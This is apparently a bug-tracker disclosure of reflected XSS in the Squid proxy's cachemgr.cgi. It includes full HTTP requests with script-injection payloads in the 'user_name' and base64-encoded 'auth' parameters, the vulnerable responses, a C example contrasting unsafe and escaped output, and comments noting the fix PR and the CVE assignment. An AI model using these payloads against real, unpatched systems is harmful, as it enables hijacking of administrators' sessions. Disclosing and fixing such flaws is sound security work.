Created attachment 3715: Screenshots of the XSS issues

The "cachemgr.cgi" web module of the Squid proxy is vulnerable to an XSS issue. The vulnerable parameters "user_name" and "auth" have insufficient sanitization in place. The method rfc1738_unescape(), defined in the source file /lib/rfc1738.c, is not enforced for all HTTP response parameters per request type defined in the cachemgr.cc source file. For instance, on line 1092 of the source file /squid/tools/cachemgr.cc, the decode_pub_auth() method does not enforce any sanitization on the parameters parsed by strtok(), which causes the first XSS vulnerability.

The first XSS vulnerability, found on the "auth" parameter, can be triggered by submitting the following GET request:

HTTP Request:

  GET /cgi-bin/cachemgr.cgi?host=localhost&port=3128&user_name=admin&operation=authenticate&auth=bG9jYWxob3N0fDE1NTg5NTYzNzJ8YWRtIj48c2NyaXB0PmFsZXJ0KCdYU1MnKTwvc2NyaXB0PmlufGRzZGFkYWE= HTTP/1.1
  Host: 10.211.55.3
  [SNIPPED]

HTTP Response:

  HTTP/1.1 200 OK
  Date: Mon, 27 May 2019 12:18:58 GMT
  Server: Apache/2.4.25 (Debian)
  [SNIPPED]
  <TR><TH ALIGN="left">Cache Host:</TH><TD><INPUT NAME="host" size="30" VALUE="localhost"></TD></TR>
  <TR><TH ALIGN="left">Cache Port:</TH><TD><INPUT NAME="port" size="30" VALUE="3128"></TD></TR>
  <TR><TH ALIGN="left">Manager name:</TH><TD><INPUT NAME="user_name" size="30" VALUE="adm"><script>alert('XSS')</script>in"></TD></TR>
  [SNIPPED]

The payload within the base64-encoded auth value (bG9jYWxob3N0fDE1NTg5NTYzNzJ8YWRtIj48c2NyaXB0PmFsZXJ0KCdYU1MnKTwvc2NyaXB0PmlufGRzZGFkYWE=) is:

  localhost|1558956372|adm"><script>alert('XSS')</script>in|dsdadaa

The second vulnerable parameter, "user_name", can be exploited by submitting the following HTTP GET request:

HTTP Request:

  GET /cgi-bin/cachemgr.cgi?server=&host=localhost&port=3128&user_name=ad"><script>alert('XSS')</script>min&passwd= HTTP/1.1
  Host: 10.211.55.3
  [SNIPPED]

HTTP Response:

  HTTP/1.1 200 200 OK
  [SNIPPED]
  <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
  <HTML><HEAD><TITLE>CacheMgr@localhost: menu</TITLE>
  <STYLE type="text/css"><!--BODY{background-color:#ffffff;font-family:verdana,sans-serif}TABLE{background-color:#333333;border:0pt;padding:0pt}TH,TD{background-color:#ffffff;white-space:nowrap}--></STYLE>
  </HEAD><BODY>
  <H2><a href="/cgi-bin/cachemgr.cgi?host=localhost&port=3128&user_name=ad"></a><script>alert('XSS')</script>min&operation=authenticate&auth=bG9jYWxob3N0fDE1NTg5NjAxNDJ8YWQiPjwvYT48c2NyaXB0PmFsZXJ0KCdYU1MnKTwvc2NyaXB0Pm1pbnwiIiIiPj4+">Cache Manager</a> menu for localhost:</H2><UL>
  <UL>
  <LI type="disk"><A HREF="/cgi-bin/cachemgr.cgi?host=localhost&port=3128&user_name=ad"></a><script>alert('XSS')</script>min&operation=index&auth=bG9jYWxob3N0fDE1NTg5NjAxNDJ8YWQiPjwvYT48c2NyaXB0PmFsZXJ0KCdYU1MnKTwvc2NyaXB0Pm1pbnwiIiIiPj4+">Cache Manager Interface</A>
  <LI type="disk"><A HREF="/cgi-bin/cachemgr.cgi?host=localhost&port=3128&user_name=ad"></a><script>alert('XSS')</script>min&operation=menu&auth=bG9jYWxob3N0fDE1NTg5NjAxNDJ8YWQiPjwvYT48c2NyaXB0PmFsZXJ0KCdYU1MnKTwvc2NyaXB0Pm1pbnwiIiIiPj4+">Cache Manager Menu</A>
  <LI type="circle">Toggle offline_mode setting (hidden)<A HREF="/cgi-bin/cachemgr.cgi?host=localhost&port=3128&user_name=ad"></a><script>alert('XSS')</script>min&operation=offline_toggle&auth=bG9jYWxob3N0fDE1NTg5NjAxNDJ8YWQiPjwvYT48c2NyaXB0PmFsZXJ0KCdYU1MnKTwvc2NyaXB0Pm1pbnwiIiIiPj4+">.</A>
  <LI type="circle">Shut Down the Squid Process (hidden)<A HREF="/cgi-bin/cachemgr.cgi?host=localhost&port=3128&user_name=ad"></a><script>alert('XSS')</script>min&operation=shutdown&auth=bG9jYWxob3N0fDE1NTg5NjAxNDJ8YWQiPjwvYT48c2NyaXB0PmFsZXJ0KCdYU1MnKTwvc2NyaXB0Pm1pbnwiIiIiPj4+">.</A>
  [SNIPPED]

Please check the screenshot for the proofs.
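The root cause described in the report is that the user field split out of the decoded auth token ("host|time|user|passwd") is written straight into the VALUE="..." attribute, so a double quote in it closes the attribute. The following is an added example, not Squid's own code, showing that unsafe rendering beside an attribute-escaped version; the helper names (html_quote, token_user, render_user_field) are hypothetical and the token is passed already base64-decoded.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Plain C replacement for strdup() so the example needs no POSIX feature macros. */
static char *xstrdup(const char *s) {
    char *d = malloc(strlen(s) + 1);
    if (d) strcpy(d, s);
    return d;
}

/* Escape every character that can break out of an HTML attribute or element.
 * Worst case each input byte expands to 6 bytes ("&quot;" / "&#39;"). */
char *html_quote(const char *s) {
    char *out = malloc(strlen(s) * 6 + 1), *p = out;
    for (; *s; s++) {
        const char *rep = NULL;
        switch (*s) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        }
        if (rep) { size_t n = strlen(rep); memcpy(p, rep, n); p += n; }
        else *p++ = *s;
    }
    *p = '\0';
    return out;
}

/* Pull the third "|"-separated field (the user name) out of a decoded token,
 * the same strtok() split the report points at. Caller frees the result. */
char *token_user(const char *decoded) {
    char *copy = xstrdup(decoded);
    char *field = strtok(copy, "|");            /* host */
    for (int i = 1; field && i < 3; i++)        /* skip time, stop at user */
        field = strtok(NULL, "|");
    char *user = xstrdup(field ? field : "");
    free(copy);
    return user;
}

/* Render the "Manager name" input. escape=0 reproduces the unsafe pattern from
 * the report (value inserted verbatim); escape=1 is the hardened form. */
char *render_user_field(const char *user, int escape) {
    char *val = escape ? html_quote(user) : xstrdup(user);
    size_t n = strlen(val) + 64;
    char *out = malloc(n);
    snprintf(out, n, "<INPUT NAME=\"user_name\" size=\"30\" VALUE=\"%s\">", val);
    free(val);
    return out;
}
```

Running the report's decoded token through token_user() and then render_user_field() with escape=0 yields the broken-out markup seen in the response; with escape=1 the quote and angle brackets are neutralised and the value stays inside the attribute.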
https://github.com/squid-cache/squid/pull/429 has been opened to resolve the issue of insufficient normalization and escaping of the HTML outputs.
PR has been applied to Squid-5. It also appears CVE-2019-13345 has been assigned for this issue.
Applied to squid-3.5 as well